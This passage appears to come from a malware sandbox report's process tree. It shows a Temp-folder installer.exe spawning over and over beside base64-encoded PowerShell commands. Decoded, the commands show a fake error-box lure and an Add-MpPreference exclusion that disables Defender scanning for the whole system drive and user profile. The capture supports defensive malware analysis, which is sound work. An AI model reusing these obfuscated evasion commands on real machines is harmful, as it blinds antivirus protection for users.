        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        115⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        115⤵
        
        PID:300
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        115⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        116⤵
        
        PID:7188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        116⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        116⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        117⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        117⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        117⤵
        
        PID:112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        118⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        118⤵
        
        PID:7448
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        118⤵
        
        PID:7856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        119⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        119⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        119⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        120⤵
        
        PID:6536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        120⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        120⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        121⤵
        
        PID:7620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        121⤵
        System Location Discovery: System Language Discovery
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        121⤵
        
        PID:7448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        122⤵
        System Location Discovery: System Language Discovery
        
        PID:4692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        122⤵
        System Location Discovery: System Language Discovery
        
        PID:7856
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        122⤵
        
        PID:8220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        123⤵
        System Location Discovery: System Language Discovery
        
        PID:8340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        123⤵
        
        PID:8436
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        123⤵
        
        PID:8756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        124⤵
        System Location Discovery: System Language Discovery
        
        PID:8788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        124⤵
        
        PID:8808
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        124⤵
        
        PID:8832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        125⤵
        
        PID:8864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        125⤵
        
        PID:8884
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        125⤵
        
        PID:9040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        126⤵
        
        PID:9128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        126⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        126⤵
        
        PID:9184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        127⤵
        
        PID:9208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        127⤵
        
        PID:8212
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        127⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        128⤵
        
        PID:8368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        128⤵
        
        PID:8456
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        128⤵
        
        PID:8576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        129⤵
        
        PID:8528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        129⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        129⤵
        System Location Discovery: System Language Discovery
        
        PID:8796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        130⤵
        
        PID:8948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
